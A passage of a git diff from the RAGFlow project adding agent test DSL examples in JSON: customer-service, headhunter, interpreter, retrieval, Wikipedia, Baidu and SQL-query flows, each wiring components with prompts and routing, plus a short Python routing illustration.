            },
            "upstream": ["switch:0"],
            "downstream": ["answer:0"]
        }
    },
    "history": [],
    "messages": [],
    "reference": {},
    "path": [],
    "answer": []
}
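The three Switch conditions above route on substring checks over generate:0's output: an OR group for "yes"/"yeah", an AND group for "no" without "yes"/"know", and a final single-item group for "know". A simplified evaluator that reproduces the same boolean logic (an illustration only, not the engine's actual implementation, which may be case-sensitive or differ in other details):

def route(generated: str) -> str:
    # Illustrative only; mirrors the condition list in the DSL above.
    text = generated.lower()
    ops = {"contains": lambda v: v in text, "not contains": lambda v: v not in text}
    conditions = [
        ("or", [("contains", "yes"), ("contains", "yeah")], "message:0"),
        ("and", [("contains", "no"), ("not contains", "yes"), ("not contains", "know")], "message:1"),
        ("or", [("contains", "know")], "message:2"),
    ]
    for logical, items, to in conditions:
        hits = [ops[op](val) for op, val in items]
        if any(hits) if logical == "or" else all(hits):
            return to
    return "answer:0"  # end_cpn_id: fall back to the answer node

print(route("Yes, it does."))    # -> message:0
print(route("No."))              # -> message:1
print(route("I don't know."))    # -> message:2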
45
agent/test/dsl_examples/categorize.json
Normal file
@@ -0,0 +1,45 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["categorize:0"],
            "upstream": ["begin"]
        },
        "categorize:0": {
            "obj": {
                "component_name": "Categorize",
                "params": {
                    "llm_id": "deepseek-chat",
                    "category_description": {
                        "product_related": {
                            "description": "The question is about the product usage, appearance and how it works.",
                            "examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?"
                        },
                        "others": {
                            "description": "The question is not about the product usage, appearance and how it works.",
                            "examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?"
                        }
                    }
                }
            },
            "downstream": [],
            "upstream": ["answer:0"]
        }
    },
    "history": [],
    "path": [],
    "answer": []
}
157
agent/test/dsl_examples/customer_service.json
Normal file
@@ -0,0 +1,157 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi! How can I help you?"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["categorize:0"],
            "upstream": ["begin", "generate:casual", "generate:answer", "generate:complain", "generate:ask_contact", "message:get_contact"]
        },
        "categorize:0": {
            "obj": {
                "component_name": "Categorize",
                "params": {
                    "llm_id": "deepseek-chat",
                    "category_description": {
                        "product_related": {
                            "description": "The question is about the product usage, appearance and how it works.",
                            "examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?\nException: Can't connect to ES cluster\nHow to build the RAGFlow image from scratch",
                            "to": "retrieval:0"
                        },
                        "casual": {
                            "description": "The question is not about the product usage, appearance and how it works. Just casual chat.",
                            "examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
                            "to": "generate:casual"
                        },
                        "complain": {
                            "description": "Complaints or even curses about the product or service, but the comment is not specific enough.",
                            "examples": "How bad is it.\nIt's really sucks.\nDamn, for God's sake, can it be more steady?\nShit, I just can't use this shit.\nI can't stand it anymore.",
                            "to": "generate:complain"
                        },
                        "answer": {
                            "description": "This answer provides specific contact information, like e-mail, phone number, WeChat number, LINE number, Twitter, Discord, etc.",
                            "examples": "My phone number is 203921\nkevinhu.hk@gmail.com\nThis is my discord number: johndowson_29384",
                            "to": "message:get_contact"
                        }
                    },
                    "message_history_window_size": 8
                }
            },
            "downstream": ["retrieval:0", "generate:casual", "generate:complain", "message:get_contact"],
            "upstream": ["answer:0"]
        },
        "generate:casual": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are a customer support agent, but the customer wants to have a casual chat with you instead of consulting about the product. Be nice, funny, enthusiastic and caring.",
                    "temperature": 0.9,
                    "message_history_window_size": 12,
                    "cite": false
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["categorize:0"]
        },
        "generate:complain": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are a customer support agent. The customer complains or even curses about the product, but not specifically enough. You need to ask what the specific problem with the product is. Be nice and patient, and soothe the customer's emotions first.",
                    "temperature": 0.9,
                    "message_history_window_size": 12,
                    "cite": false
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["categorize:0"]
        },
        "retrieval:0": {
            "obj": {
                "component_name": "Retrieval",
                "params": {
                    "similarity_threshold": 0.2,
                    "keywords_similarity_weight": 0.3,
                    "top_n": 6,
                    "top_k": 1024,
                    "rerank_id": "BAAI/bge-reranker-v2-m3",
                    "kb_ids": ["869a236818b811ef91dffa163e197198"]
                }
            },
            "downstream": ["relevant:0"],
            "upstream": ["categorize:0"]
        },
        "relevant:0": {
            "obj": {
                "component_name": "Relevant",
                "params": {
                    "llm_id": "deepseek-chat",
                    "temperature": 0.02,
                    "yes": "generate:answer",
                    "no": "generate:ask_contact"
                }
            },
            "downstream": ["generate:answer", "generate:ask_contact"],
            "upstream": ["retrieval:0"]
        },
        "generate:answer": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are an intelligent assistant. Please answer the question based on content of the knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as follows:\n {input}\n The above is the content of the knowledge base.",
                    "temperature": 0.02
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["relevant:0"]
        },
        "generate:ask_contact": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are a customer support agent, but you can't answer the customer's question. You need to request their contact information, like e-mail, phone number, WeChat number, LINE number, Twitter, Discord, etc. Product experts will contact them later. Please do not ask the same question twice.",
                    "temperature": 0.9,
                    "message_history_window_size": 12,
                    "cite": false
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["relevant:0"]
        },
        "message:get_contact": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "messages": [
                        "Okay, I've written this down. What else can I do for you?",
                        "Got it. What else can I do for you?",
                        "Thanks for your trust! Our expert will contact you ASAP. So, anything else I can do for you?",
                        "Thanks! So, anything else I can do for you?"
                    ]
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["categorize:0"]
        }
    },
    "history": [],
    "messages": [],
    "path": [],
    "reference": [],
    "answer": []
}
43
agent/test/dsl_examples/exesql.json
Normal file
@@ -0,0 +1,43 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["exesql:0"],
            "upstream": ["begin", "exesql:0"]
        },
        "exesql:0": {
            "obj": {
                "component_name": "ExeSQL",
                "params": {
                    "database": "rag_flow",
                    "username": "root",
                    "host": "mysql",
                    "port": 3306,
                    "password": "infini_rag_flow",
                    "top_n": 3
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["answer:0"]
        }
    },
    "history": [],
    "messages": [],
    "reference": {},
    "path": [],
    "answer": []
}
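The ExeSQL parameters above map one-to-one onto a client connection. A minimal connectivity sketch with peewee, the same library the canvas API's test_db_connect endpoint uses later in this diff (credentials are copied from the example DSL; adjust them to your deployment):

from peewee import MySQLDatabase

# Credentials taken from the example DSL above; placeholders for a real deployment.
db = MySQLDatabase("rag_flow", user="root", host="mysql", port=3306, password="infini_rag_flow")
db.connect()
print(db.execute_sql("SELECT 1").fetchone())
db.close()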
210
agent/test/dsl_examples/headhunter_zh.json
Normal file
@@ -0,0 +1,210 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "您好!我是AGI方向的猎头,了解到您是这方面的大佬,然后冒昧的就联系到您。这边有个机会想和您分享,RAGFlow正在招聘您这个岗位的资深的工程师不知道您那边是不是感兴趣?"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["categorize:0"],
            "upstream": ["begin", "message:reject"]
        },
        "categorize:0": {
            "obj": {
                "component_name": "Categorize",
                "params": {
                    "llm_id": "deepseek-chat",
                    "category_description": {
                        "about_job": {
                            "description": "该问题关于职位本身或公司的信息。",
                            "examples": "什么岗位?\n汇报对象是谁?\n公司多少人?\n公司有啥产品?\n具体工作内容是啥?\n地点哪里?\n双休吗?",
                            "to": "retrieval:0"
                        },
                        "casual": {
                            "description": "该问题不关于职位本身或公司的信息,属于闲聊。",
                            "examples": "你好\n好久不见\n你男的女的?\n你是猴子派来的救兵吗?\n上午开会了?\n你叫啥?\n最近市场如何?生意好做吗?",
                            "to": "generate:casual"
                        },
                        "interested": {
                            "description": "该回答表示他对于该职位感兴趣。",
                            "examples": "嗯\n说吧\n说说看\n还好吧\n是的\n哦\nyes\n具体说说",
                            "to": "message:introduction"
                        },
                        "answer": {
                            "description": "该回答表示他对于该职位不感兴趣,或感觉受到骚扰。",
                            "examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n我已经不干这个了\n我不是这个方向的",
                            "to": "message:reject"
                        }
                    }
                }
            },
            "downstream": [
                "message:introduction",
                "generate:casual",
                "message:reject",
                "retrieval:0"
            ],
            "upstream": ["answer:0"]
        },
        "message:introduction": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "messages": [
                        "我简单介绍以下:\nRAGFlow 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。https://github.com/infiniflow/ragflow\n您那边还有什么要了解的?"
                    ]
                }
            },
            "downstream": ["answer:1"],
            "upstream": ["categorize:0"]
        },
        "answer:1": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["categorize:1"],
            "upstream": [
                "message:introduction",
                "generate:aboutJob",
                "generate:casual",
                "generate:get_wechat",
                "generate:nowechat"
            ]
        },
        "categorize:1": {
            "obj": {
                "component_name": "Categorize",
                "params": {
                    "llm_id": "deepseek-chat",
                    "category_description": {
                        "about_job": {
                            "description": "该问题关于职位本身或公司的信息。",
                            "examples": "什么岗位?\n汇报对象是谁?\n公司多少人?\n公司有啥产品?\n具体工作内容是啥?\n地点哪里?\n双休吗?",
                            "to": "retrieval:0"
                        },
                        "casual": {
                            "description": "该问题不关于职位本身或公司的信息,属于闲聊。",
                            "examples": "你好\n好久不见\n你男的女的?\n你是猴子派来的救兵吗?\n上午开会了?\n你叫啥?\n最近市场如何?生意好做吗?",
                            "to": "generate:casual"
                        },
                        "wechat": {
                            "description": "该回答表示他愿意加微信,或者已经报了微信号。",
                            "examples": "嗯\n可以\n是的\n哦\nyes\n15002333453\nwindblow_2231",
                            "to": "generate:get_wechat"
                        },
                        "giveup": {
                            "description": "该回答表示他不愿意加微信。",
                            "examples": "不需要\n不感兴趣\n暂时不看\n不要\nno\n不方便\n不知道还要加我微信",
                            "to": "generate:nowechat"
                        }
                    },
                    "message_history_window_size": 8
                }
            },
            "downstream": [
                "retrieval:0",
                "generate:casual",
                "generate:get_wechat",
                "generate:nowechat"
            ],
            "upstream": ["answer:1"]
        },
        "generate:casual": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "你是AGI方向的猎头,现在候选人的聊了和职位无关的话题,请耐心的回应候选人,并将话题往该AGI的职位上带,最好能要到候选人微信号以便后面保持联系。",
                    "temperature": 0.9,
                    "message_history_window_size": 12,
                    "cite": false
                }
            },
            "downstream": ["answer:1"],
            "upstream": ["categorize:0", "categorize:1"]
        },
        "retrieval:0": {
            "obj": {
                "component_name": "Retrieval",
                "params": {
                    "similarity_threshold": 0.2,
                    "keywords_similarity_weight": 0.3,
                    "top_n": 6,
                    "top_k": 1024,
                    "rerank_id": "BAAI/bge-reranker-v2-m3",
                    "kb_ids": ["869a236818b811ef91dffa163e197198"]
                }
            },
            "downstream": ["generate:aboutJob"],
            "upstream": ["categorize:0", "categorize:1"]
        },
        "generate:aboutJob": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "你是AGI方向的猎头,候选人问了有关职位或公司的问题,你根据以下职位信息回答。如果职位信息中不包含候选人的问题就回答不清楚、不知道、有待确认等。回答完后引导候选人加微信号,如:\n - 方便加一下微信吗,我把JD发您看看?\n - 微信号多少,我把详细职位JD发您?\n 职位信息如下:\n {input}\n 职位信息如上。",
                    "temperature": 0.02
                }
            },
            "downstream": ["answer:1"],
            "upstream": ["retrieval:0"]
        },
        "generate:get_wechat": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "你是AGI方向的猎头,候选人表示不反感加微信,如果对方已经报了微信号,表示感谢和信任并表示马上会加上;如果没有,则问对方微信号多少。你的微信号是weixin_kevin,E-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
                    "temperature": 0.1,
                    "message_history_window_size": 12,
                    "cite": false
                }
            },
            "downstream": ["answer:1"],
            "upstream": ["categorize:1"]
        },
        "generate:nowechat": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "你是AGI方向的猎头,当你提出加微信时对方表示拒绝。你需要耐心礼貌的回应候选人,表示对于保护隐私信息给予理解,也可以询问他对该职位的看法和顾虑。并在恰当的时机再次询问微信联系方式。也可以鼓励候选人主动与你取得联系。你的微信号是weixin_kevin,E-mail是kkk@ragflow.com。说话不要重复。不要总是您好。",
                    "temperature": 0.1,
                    "message_history_window_size": 12,
                    "cite": false
                }
            },
            "downstream": ["answer:1"],
            "upstream": ["categorize:1"]
        },
        "message:reject": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "messages": [
                        "好的,祝您生活愉快,工作顺利。",
                        "哦,好的,感谢您宝贵的时间!"
                    ]
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["categorize:0"]
        }
    },
    "history": [],
    "messages": [],
    "path": [],
    "reference": [],
    "answer": []
}
39
agent/test/dsl_examples/intergreper.json
Normal file
@@ -0,0 +1,39 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there! Please enter the text you want to translate in a format like: 'text you want to translate' => target language. For example: 您好! => English"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["generate:0"],
            "upstream": ["begin", "generate:0"]
        },
        "generate:0": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are a professional interpreter.\n- Role: a professional interpreter.\n- Input format: content to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
                    "temperature": 0.5
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["answer:0"]
        }
    },
    "history": [],
    "messages": [],
    "reference": {},
    "path": [],
    "answer": []
}
39
agent/test/dsl_examples/interpreter.json
Normal file
@@ -0,0 +1,39 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there! Please enter the text you want to translate in a format like: 'text you want to translate' => target language. For example: 您好! => English"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["generate:0"],
            "upstream": ["begin", "generate:0"]
        },
        "generate:0": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are a professional interpreter.\n- Role: a professional interpreter.\n- Input format: content to be translated => target language. \n- Answer format: => translated content in target language. \n- Examples:\n - user: 您好! => English. assistant: => How are you doing!\n - user: You look good today. => Japanese. assistant: => 今日は調子がいいですね 。\n",
                    "temperature": 0.5
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["answer:0"]
        }
    },
    "history": [],
    "messages": [],
    "reference": {},
    "path": [],
    "answer": []
}
62
agent/test/dsl_examples/keyword_wikipedia_and_generate.json
Normal file
@@ -0,0 +1,62 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["keyword:0"],
            "upstream": ["begin", "generate:1"]
        },
        "keyword:0": {
            "obj": {
                "component_name": "KeywordExtract",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "- Role: You're a question analyzer.\n - Requirements:\n - Summarize user's question, and give top %s important keyword/phrase.\n - Use comma as a delimiter to separate keywords/phrases.\n - Answer format: (in language of user's question)\n - keyword: ",
                    "temperature": 0.2,
                    "top_n": 1
                }
            },
            "downstream": ["wikipedia:0"],
            "upstream": ["answer:0"]
        },
        "wikipedia:0": {
            "obj": {
                "component_name": "Wikipedia",
                "params": {
                    "top_n": 10
                }
            },
            "downstream": ["generate:1"],
            "upstream": ["keyword:0"]
        },
        "generate:1": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are an intelligent assistant. Please answer the question based on content from Wikipedia. When the answer from Wikipedia is incomplete, you need to output the URL link of the corresponding content as well. When all the content searched from Wikipedia is irrelevant to the question, your answer must include the sentence, \"The answer you are looking for is not found in the Wikipedia!\". Answers need to consider chat history.\n The content of Wikipedia is as follows:\n {input}\n The above is the content of Wikipedia.",
                    "temperature": 0.2
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["wikipedia:0"]
        }
    },
    "history": [],
    "path": [],
    "messages": [],
    "reference": {},
    "answer": []
}
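The Wikipedia component's top_n caps how many hits feed generate:1. A rough sketch of an equivalent lookup using the wikipedia package, purely for illustration (the component's real implementation is not shown in this diff and may use a different library or API):

import wikipedia

top_n = 10  # mirrors the DSL parameter above
titles = wikipedia.search("large language model", results=top_n)
for title in titles:
    print(title)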
54
agent/test/dsl_examples/retrieval_and_generate.json
Normal file
@@ -0,0 +1,54 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["retrieval:0"],
            "upstream": ["begin", "generate:0"]
        },
        "retrieval:0": {
            "obj": {
                "component_name": "Retrieval",
                "params": {
                    "similarity_threshold": 0.2,
                    "keywords_similarity_weight": 0.3,
                    "top_n": 6,
                    "top_k": 1024,
                    "rerank_id": "BAAI/bge-reranker-v2-m3",
                    "kb_ids": ["869a236818b811ef91dffa163e197198"]
                }
            },
            "downstream": ["generate:0"],
            "upstream": ["answer:0"]
        },
        "generate:0": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
                    "temperature": 0.2
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["retrieval:0"]
        }
    },
    "history": [],
    "messages": [],
    "reference": {},
    "path": [],
    "answer": []
}
@@ -0,0 +1,88 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["categorize:0"],
            "upstream": ["begin", "generate:0", "message:0"]
        },
        "categorize:0": {
            "obj": {
                "component_name": "Categorize",
                "params": {
                    "llm_id": "deepseek-chat",
                    "category_description": {
                        "product_related": {
                            "description": "The question is about the product usage, appearance and how it works.",
                            "examples": "Why it always beaming?\nHow to install it onto the wall?\nIt leaks, what to do?",
                            "to": "retrieval:0"
                        },
                        "others": {
                            "description": "The question is not about the product usage, appearance and how it works.",
                            "examples": "How are you doing?\nWhat is your name?\nAre you a robot?\nWhat's the weather?\nWill it rain?",
                            "to": "message:0"
                        }
                    }
                }
            },
            "downstream": ["retrieval:0", "message:0"],
            "upstream": ["answer:0"]
        },
        "message:0": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "messages": [
                        "Sorry, I don't know. I'm an AI bot."
                    ]
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["categorize:0"]
        },
        "retrieval:0": {
            "obj": {
                "component_name": "Retrieval",
                "params": {
                    "similarity_threshold": 0.2,
                    "keywords_similarity_weight": 0.3,
                    "top_n": 6,
                    "top_k": 1024,
                    "rerank_id": "BAAI/bge-reranker-v2-m3",
                    "kb_ids": ["869a236818b811ef91dffa163e197198"]
                }
            },
            "downstream": ["generate:0"],
            "upstream": ["categorize:0"]
        },
        "generate:0": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are an intelligent assistant. Please summarize the content of the knowledge base to answer the question. Please list the data in the knowledge base and answer in detail. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\" Answers need to consider chat history.\n Here is the knowledge base:\n {input}\n The above is the knowledge base.",
                    "temperature": 0.2
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["retrieval:0"]
        }
    },
    "history": [],
    "messages": [],
    "reference": {},
    "path": [],
    "answer": []
}
82
agent/test/dsl_examples/retrieval_relevant_and_generate.json
Normal file
@@ -0,0 +1,82 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["retrieval:0"],
            "upstream": ["begin", "generate:0", "message:0"]
        },
        "retrieval:0": {
            "obj": {
                "component_name": "Retrieval",
                "params": {
                    "similarity_threshold": 0.2,
                    "keywords_similarity_weight": 0.3,
                    "top_n": 6,
                    "top_k": 1024,
                    "rerank_id": "BAAI/bge-reranker-v2-m3",
                    "kb_ids": ["869a236818b811ef91dffa163e197198"],
                    "empty_response": "Sorry, the knowledge base has no related information."
                }
            },
            "downstream": ["relevant:0"],
            "upstream": ["answer:0"]
        },
        "relevant:0": {
            "obj": {
                "component_name": "Relevant",
                "params": {
                    "llm_id": "deepseek-chat",
                    "temperature": 0.02,
                    "yes": "generate:0",
                    "no": "message:0"
                }
            },
            "downstream": ["message:0", "generate:0"],
            "upstream": ["retrieval:0"]
        },
        "generate:0": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are an intelligent assistant. Please answer the question based on content of the knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as follows:\n {input}\n The above is the content of the knowledge base.",
                    "temperature": 0.2
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["relevant:0"]
        },
        "message:0": {
            "obj": {
                "component_name": "Message",
                "params": {
                    "messages": [
                        "Sorry, I don't know. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
                        "I'm an AI bot and not quite sure about this question. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?",
                        "Can't find answer in my knowledge base. Please leave your contact, our experts will contact you later. What's your e-mail/phone/wechat?"
                    ]
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["relevant:0"]
        }
    },
    "history": [],
    "path": [],
    "messages": [],
    "reference": {},
    "answer": []
}
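The Relevant component acts as an LLM-judged binary gate: when the retrieved chunks look relevant to the question, control flows to the component named in "yes", otherwise to "no". Schematically (the real component makes this decision with the configured LLM, not a boolean flag):

def relevant_gate(judged_relevant: bool, yes: str = "generate:0", no: str = "message:0") -> str:
    # Schematic only: stands in for the LLM's yes/no relevance judgment.
    return yes if judged_relevant else no

print(relevant_gate(True))   # -> generate:0 answers from the knowledge base
print(relevant_gate(False))  # -> message:0 asks the user for contact details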
@@ -0,0 +1,103 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["retrieval:0"],
            "upstream": ["begin", "generate:0", "generate:1"]
        },
        "retrieval:0": {
            "obj": {
                "component_name": "Retrieval",
                "params": {
                    "similarity_threshold": 0.2,
                    "keywords_similarity_weight": 0.3,
                    "top_n": 6,
                    "top_k": 1024,
                    "rerank_id": "BAAI/bge-reranker-v2-m3",
                    "kb_ids": ["21ca4e6a2c8911ef8b1e0242ac120006"],
                    "empty_response": "Sorry, the knowledge base has no related information."
                }
            },
            "downstream": ["relevant:0"],
            "upstream": ["answer:0"]
        },
        "relevant:0": {
            "obj": {
                "component_name": "Relevant",
                "params": {
                    "llm_id": "deepseek-chat",
                    "temperature": 0.02,
                    "yes": "generate:0",
                    "no": "keyword:0"
                }
            },
            "downstream": ["keyword:0", "generate:0"],
            "upstream": ["retrieval:0"]
        },
        "generate:0": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are an intelligent assistant. Please answer the question based on content of the knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as follows:\n {input}\n The above is the content of the knowledge base.",
                    "temperature": 0.2
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["relevant:0"]
        },
        "keyword:0": {
            "obj": {
                "component_name": "KeywordExtract",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "- Role: You're a question analyzer.\n - Requirements:\n - Summarize user's question, and give top %s important keyword/phrase.\n - Use comma as a delimiter to separate keywords/phrases.\n - Answer format: (in language of user's question)\n - keyword: ",
                    "temperature": 0.2,
                    "top_n": 1
                }
            },
            "downstream": ["baidu:0"],
            "upstream": ["relevant:0"]
        },
        "baidu:0": {
            "obj": {
                "component_name": "Baidu",
                "params": {
                    "top_n": 10
                }
            },
            "downstream": ["generate:1"],
            "upstream": ["keyword:0"]
        },
        "generate:1": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are an intelligent assistant. Please answer the question based on content searched from Baidu. When the answer from a Baidu search is incomplete, you need to output the URL link of the corresponding content as well. When all the content searched from Baidu is irrelevant to the question, your answer must include the sentence, \"The answer you are looking for is not found in the Baidu search!\". Answers need to consider chat history.\n The content of Baidu search is as follows:\n {input}\n The above is the content of Baidu search.",
                    "temperature": 0.2
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["baidu:0"]
        }
    },
    "history": [],
    "path": [],
    "messages": [],
    "reference": {},
    "answer": []
}
@@ -0,0 +1,79 @@
{
    "components": {
        "begin": {
            "obj": {
                "component_name": "Begin",
                "params": {
                    "prologue": "Hi there!"
                }
            },
            "downstream": ["answer:0"],
            "upstream": []
        },
        "answer:0": {
            "obj": {
                "component_name": "Answer",
                "params": {}
            },
            "downstream": ["retrieval:0"],
            "upstream": ["begin", "generate:0"]
        },
        "retrieval:0": {
            "obj": {
                "component_name": "Retrieval",
                "params": {
                    "similarity_threshold": 0.2,
                    "keywords_similarity_weight": 0.3,
                    "top_n": 6,
                    "top_k": 1024,
                    "rerank_id": "BAAI/bge-reranker-v2-m3",
                    "kb_ids": ["869a236818b811ef91dffa163e197198"],
                    "empty_response": "Sorry, the knowledge base has no related information."
                }
            },
            "downstream": ["relevant:0"],
            "upstream": ["answer:0", "rewrite:0"]
        },
        "relevant:0": {
            "obj": {
                "component_name": "Relevant",
                "params": {
                    "llm_id": "deepseek-chat",
                    "temperature": 0.02,
                    "yes": "generate:0",
                    "no": "rewrite:0"
                }
            },
            "downstream": ["generate:0", "rewrite:0"],
            "upstream": ["retrieval:0"]
        },
        "generate:0": {
            "obj": {
                "component_name": "Generate",
                "params": {
                    "llm_id": "deepseek-chat",
                    "prompt": "You are an intelligent assistant. Please answer the question based on content of the knowledge base. When all knowledge base content is irrelevant to the question, your answer must include the sentence \"The answer you are looking for is not found in the knowledge base!\". Answers need to consider chat history.\n Knowledge base content is as follows:\n {input}\n The above is the content of the knowledge base.",
                    "temperature": 0.02
                }
            },
            "downstream": ["answer:0"],
            "upstream": ["relevant:0"]
        },
        "rewrite:0": {
            "obj": {
                "component_name": "RewriteQuestion",
                "params": {
                    "llm_id": "deepseek-chat",
                    "temperature": 0.8
                }
            },
            "downstream": ["retrieval:0"],
            "upstream": ["relevant:0"]
        }
    },
    "history": [],
    "messages": [],
    "path": [],
    "reference": [],
    "answer": []
}
@@ -1,120 +1,126 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
